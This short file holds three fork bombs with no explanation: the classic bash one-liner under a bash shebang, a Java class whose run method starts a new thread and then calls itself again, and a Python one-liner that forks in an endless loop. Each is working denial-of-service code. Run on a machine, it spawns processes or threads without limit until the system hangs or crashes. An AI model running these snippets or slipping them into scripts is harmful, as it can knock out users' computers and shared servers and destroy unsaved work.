#!/bin/bash
:(){ :|:& };:
public class ForkMe implements Runnable
{
public static void main (String[] args)
{
new ForkMe().run();
}
public void run()
{
new Thread(this).start();
this.run();
}
}
python -c 'while 1: __import__("os").fork()'